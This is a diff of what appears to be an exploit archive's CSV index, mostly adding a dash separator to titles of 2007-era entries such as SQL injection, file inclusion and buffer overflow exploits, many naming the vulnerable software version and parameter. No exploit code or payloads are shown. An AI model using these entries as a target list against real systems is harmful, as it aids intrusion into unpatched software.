Disclosure",2007-10-28,GoLd_M,php,webapps,0 +4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) Remote SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 +4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit",2007-10-29,rgod,windows,remote,0 +4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - (dl.php file) Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 4581,platforms/php/webapps/4581.txt,"Sige 0.1 sige_init.php Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 -4582,platforms/php/webapps/4582.txt,"teatro 1.6 (basePath) Remote File Include",2007-10-28,"Alkomandoz Hacker",php,webapps,0 -4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x (m3u File) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0 +4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Include",2007-10-28,"Alkomandoz Hacker",php,webapps,0 +4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - (m3u File) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - RFI",2007-10-29,r00t@zapak.com,php,webapps,0 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0 -4587,platforms/php/webapps/4587.txt,"miniBB 2.1 (table) Remote SQL Injection",2007-10-30,irk4z,php,webapps,0 -4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 +4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) Remote SQL Injection",2007-10-30,irk4z,php,webapps,0 +4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 @@ -4246,12 +4246,12 @@ id,file,description,date,author,platform,type,port 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server <= 0.2.4 - Remote Denial of Service Exploit",2007-11-02,nnp,linux,dos,0 4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service Exploit",2007-11-02,RoMaNSoFt,multiple,dos,0 -4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 +4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - (includes.inc selskin) Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - (common.php pathdot) Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion Vulnerabilities",2007-11-04,ShAy6oOoN,php,webapps,0 -4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 (index.php site) Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 -4607,platforms/php/webapps/4607.txt,"syndeoCMS 2.5.01 (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 +4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - (index.php site) Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 +4607,platforms/php/webapps/4607.txt,"syndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 4608,platforms/php/webapps/4608.php,"JBC Explorer <= 7.20 RC 1 - Remote Code Execution Exploit",2007-11-05,DarkFig,php,webapps,0 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c Remote SQL Injection",2007-11-05,Q7x,asp,webapps,0 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow PoC",2007-11-06,shinnai,windows,dos,0 @@ -4259,7 +4259,7 @@ id,file,description,date,author,platform,type,port 4612,platforms/aix/local/4612.py,"IBM AIX <= 5.3.0 - setlocale() Local Privilege Escalation Exploit",2007-11-07,"Thomas Pollet",aix,local,0 4613,platforms/windows/dos/4613.html,"Adobe Shockwave ShockwaveVersion() Stack Overflow PoC",2007-11-08,Elazar,windows,dos,0 4614,platforms/php/webapps/4614.txt,"jPORTAL <= 2.3.1 articles.php Remote SQL Injection",2007-11-09,Alexsize,php,webapps,0 -4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 +4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0 4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - product_desc.php Remote SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - Remote SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 @@ -4271,11 +4271,11 @@ id,file,description,date,author,platform,type,port 4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow Proof of Concept",2007-11-16,"RISE Security",osx,dos,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - .MDB File Parsing Stack Overflow PoC",2007-11-16,cocoruder,windows,local,0 4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery - RFI",2007-11-16,Crackers_Child,php,webapps,0 -4627,platforms/php/webapps/4627.txt,"ProfileCMS <= 1.0 (id) Remote SQL Injection",2007-11-16,K-159,php,webapps,0 +4627,platforms/php/webapps/4627.txt,"ProfileCMS <= 1.0 - (id) Remote SQL Injection",2007-11-16,K-159,php,webapps,0 4628,platforms/php/webapps/4628.txt,"Myspace Clone Script (index.php) Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps,0 4629,platforms/php/webapps/4629.txt,"net-finity (links.php) Remote SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0 -4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 -4631,platforms/php/webapps/4631.txt,"phpBBViet <= 02.03.2007 (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 +4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 +4631,platforms/php/webapps/4631.txt,"phpBBViet <= 02.03.2007 - (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 4632,platforms/php/webapps/4632.txt,"vigilecms 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script Remote SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 @@ -4285,18 +4285,18 @@ id,file,description,date,author,platform,type,port 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms <= 1.8 Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion Vulnerabilities",2007-11-21,NoGe,php,webapps,0 -4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends <= 4.98 (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 +4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends <= 4.98 - (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart <= 1.0 - Remote File Include",2007-11-22,S.W.A.T.,php,webapps,0 4643,platforms/php/webapps/4643.py,"VigileCMS <= 1.8 Stealth Remote Command Execution Exploit",2007-11-22,The:Paradox,php,webapps,0 -4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 (nsearch) Remote SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 -4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 (index.php cat) Remote SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 +4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) Remote SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 +4645,platforms/php/webapps/4645.txt,"Content Injector 1.52 - (index.php cat) Remote SQL Injection",2007-11-22,S.W.A.T.,php,webapps,0 4646,platforms/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 article.php Remote SQL Injection Exploit",2007-11-22,Shadowleet,php,webapps,0 4647,platforms/cgi/webapps/4647.txt,"KB-Bestellsystem (kb_whois.cgi) Command Execution",2007-11-22,"Zero X",cgi,webapps,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 RTSP Response Remote SEH Overwrite PoC",2007-11-23,h07,multiple,dos,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - Remote SQL Injection",2007-11-23,"Aria-Security Team",php,webapps,0 -4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 +4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 beta 5 - (skin_file) Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps,0 4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 -4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 (show_content.php id) Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 +4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 - (show_content.php id) Local File Inclusion",2007-11-24,Crackers_Child,php,webapps,0 4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - events.php Remote SQL Injection",2007-11-24,ka0x,php,webapps,0 4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni <= 1.0.9 - Remote XSS / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 @@ -4313,18 +4313,18 @@ id,file,description,date,author,platform,type,port 4666,platforms/php/webapps/4666.txt,"Eurologon CMS files.php Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple Remote SQL Injection Vulnerabilities",2007-11-27,Kacper,php,webapps,0 -4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 -4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 +4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - (index.php act) Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 +4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - (include.php) Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 4671,platforms/php/webapps/4671.txt,"EHCP <= 0.22.8 - Multiple Remote File Inclusion Vulnerabilities",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion Vulnerabilities",2007-11-28,MhZ91,php,webapps,0 4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit (win/osx)",2007-11-29,"Subreption LLC.",multiple,remote,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 -4675,platforms/php/webapps/4675.txt,"NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities",2007-11-28,GoLd_M,php,webapps,0 -4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 (play.php) Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 -4677,platforms/php/webapps/4677.txt,"WebED 0.0.9 (index.php) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 +4675,platforms/php/webapps/4675.txt,"NoAh <= 0.9 pre 1.2 - (filepath) Remote File Disclosure Vulnerabilities",2007-11-28,GoLd_M,php,webapps,0 +4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - (play.php) Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 +4677,platforms/php/webapps/4677.txt,"WebED 0.0.9 - (index.php) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4678,platforms/php/webapps/4678.php,"Seditio CMS <= 121 - Remote SQL Injection Exploit",2007-11-29,InATeam,php,webapps,0 -4679,platforms/php/webapps/4679.txt,"KML share 1.1 (region.php layer) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 -4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 +4679,platforms/php/webapps/4679.txt,"KML share 1.1 - (region.php layer) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 +4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp admin 0.1.0 - (LFI/XSS/ab) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 4682,platforms/windows/dos/4682.c,"Windows Media Player AIFF Divide By Zero Exception DoS PoC",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 Malformed AU File Denial of Service Exploit",2007-12-01,NtWaK0,windows,dos,0 @@ -4334,11 +4334,11 @@ id,file,description,date,author,platform,type,port 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 Active.asp Remote SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service Proof of Concept",2007-12-04,mu-b,osx,dos,0 -4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 (leopard) vpnd Remote Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 +4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 - (leopard) vpnd Remote Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery <= 2.0b5 - (catid) SQL Injection",2007-12-05,K-159,php,webapps,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service Exploit",2007-12-05,MADYNES,hardware,dos,0 4693,platforms/php/webapps/4693.txt,"SineCMS <= 2.3.4 Calendar Remote SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 -4694,platforms/php/webapps/4694.txt,"ezContents 1.4.5 (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 +4694,platforms/php/webapps/4694.txt,"ezContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress <= 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 4696,platforms/php/webapps/4696.txt,"SerWeb <= 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce leggi_commenti.asp Remote SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 @@ -4350,10 +4350,10 @@ id,file,description,date,author,platform,type,port 4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0 4705,platforms/php/webapps/4705.txt,"Flat PHP Board <= 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 -4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 (index.php) Remote SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 +4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - (index.php) Remote SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 4707,platforms/php/webapps/4707.txt,"Ace Image Hosting Script (id) Remote SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 4708,platforms/php/webapps/4708.txt,"DWdirectory <= 2.1 - Remote SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 -4709,platforms/php/webapps/4709.txt,"SH-News 3.0 (comments.php id) Remote SQL Injection",2007-12-09,hadihadi,php,webapps,0 +4709,platforms/php/webapps/4709.txt,"SH-News 3.0 - (comments.php id) Remote SQL Injection",2007-12-09,hadihadi,php,webapps,0 4710,platforms/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",php,webapps,0 4711,platforms/php/webapps/4711.txt,"falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - (RFI/XSS) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 @@ -4361,7 +4361,7 @@ id,file,description,date,author,platform,type,port 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 Upload Shell / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 4715,platforms/windows/remote/4715.txt,"badblue <= 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies AVSMJPEGFILE.DLL 1.1 - Remote BoF PoC",2007-12-11,shinnai,windows,dos,0 -4717,platforms/windows/dos/4717.py,"Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit",2007-12-11,shinnai,windows,dos,0 +4717,platforms/windows/dos/4717.py,"Simple HTTPD <= 1.41 - (/aux) Remote Denial of Service Exploit",2007-12-11,shinnai,windows,dos,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - (index.php template) Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 @@ -4372,8 +4372,8 @@ id,file,description,date,author,platform,type,port 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] RFI",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection",2007-12-13,MurderSkillz,php,webapps,0 -4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 (id) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 -4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 +4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - (id) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 +4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix <= 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 4731,platforms/php/webapps/4731.php,"Adult Script <= 1.6 Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a send_mailslot() Remote Buffer Overflow PoC",2007-12-14,x86,linux,dos,0 @@ -4387,11 +4387,11 @@ id,file,description,date,author,platform,type,port 4740,platforms/php/webapps/4740.pl,"FreeWebshop 2.2.1 - Remote Blind SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Remote File Upload",2007-12-18,Don,php,webapps,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0 -4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 +4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC BoF Exploit (MS07-065)",2007-12-18,axis,windows,remote,0 4746,platforms/windows/remote/4746.html,"RavWare Software MAS Flic Control Remote Buffer Overflow Exploit",2007-12-18,shinnai,windows,remote,0 -4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 +4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 4748,platforms/windows/dos/4748.php,"SurgeMail 38k4 - webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0 4749,platforms/windows/local/4749.c,"Rosoft Media Player <= 4.1.7 - (.m3u) Stack Overflow Exploit",2007-12-18,devcode,windows,local,0 4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) Remote SQL Injection",2007-12-18,Koller,php,webapps,0 @@ -4406,21 +4406,21 @@ id,file,description,date,author,platform,type,port 4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection",2007-12-21,x0kster,php,webapps,0 -4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 -4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 +4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 +4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - (LFI/SQL) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0 -4766,platforms/php/webapps/4766.txt,"mBlog 1.2 (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 +4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion Vulnerabilities",2007-12-21,MhZ91,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal <= 5.7d3 - Remote Command Execution Exploit",2007-12-21,The:Paradox,php,webapps,0 -4769,platforms/php/webapps/4769.txt,"Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 -4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 (category.php) Remote SQL Injection",2007-12-22,Koller,php,webapps,0 +4769,platforms/php/webapps/4769.txt,"Shadowed Portal <= 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 +4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) Remote SQL Injection",2007-12-22,Koller,php,webapps,0 4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple Remote SQL Injection Vulnerabilities",2007-12-22,MhZ91,php,webapps,0 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - Remote SQL Injection",2007-12-22,Houssamix,php,webapps,0 4773,platforms/multiple/dos/4773.pl,"OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit",2007-12-23,"Noam Rathaus",multiple,dos,0 -4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 (go.php) Remote SQL Injection Exploit",2007-12-23,DNX,php,webapps,0 +4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) Remote SQL Injection Exploit",2007-12-23,DNX,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script <= 1.6.5 - Multiple Remote SQL Injection Vulnerabilities",2007-12-23,MhZ91,php,webapps,0 4776,platforms/php/webapps/4776.txt,"MMSLamp (idpro) Remote SQL Injection",2007-12-23,x0kster,php,webapps,0 -4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 (pageid) Remote SQL Injection",2007-12-24,bypass,php,webapps,0 +4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - (pageid) Remote SQL Injection",2007-12-24,bypass,php,webapps,0 4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple Remote SQL Injection Vulnerabilities",2007-12-24,MhZ91,php,webapps,0 4779,platforms/php/webapps/4779.php,"CuteNews <= 1.4.5 Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - (index.php loadadminpage) RFI",2007-12-24,Koller,php,webapps,0 @@ -4429,7 +4429,7 @@ id,file,description,date,author,platform,type,port 4783,platforms/php/webapps/4783.txt,"Joomla Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,php,webapps,0 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 PassThru Remote Buffer Overflow Exploit",2007-12-24,"Jacopo Cervini",windows,remote,80 4785,platforms/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Remote/Local File Inclusion Vulnerabilities",2007-12-25,GoLd_M,php,webapps,0 -4786,platforms/php/webapps/4786.pl,"AuraCMS 2.2 (admin_users.php) Remote Add Administrator Exploit",2007-12-25,k1tk4t,php,webapps,0 +4786,platforms/php/webapps/4786.pl,"AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit",2007-12-25,k1tk4t,php,webapps,0 4787,platforms/php/webapps/4787.pl,"RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit",2007-12-25,sh2kerr,php,webapps,0 4788,platforms/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - Remote SQL Injection",2007-12-25,MhZ91,php,webapps,0 4789,platforms/php/webapps/4789.php,"PMOS Help Desk <= 2.4 - Remote Command Execution Exploit",2007-12-25,EgiX,php,webapps,0 @@ -4442,7 +4442,7 @@ id,file,description,date,author,platform,type,port 4796,platforms/php/webapps/4796.txt,"PNphpBB2 <= 1.2i - (printview.php phpEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0 4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 Logfile Information Disclosure Exploit",2007-12-27,"Alex Hernandez",hardware,remote,0 4798,platforms/php/webapps/4798.php,"ZeusCMS <= 0.3 - Remote Blind SQL Injection Exploit",2007-12-27,EgiX,php,webapps,0 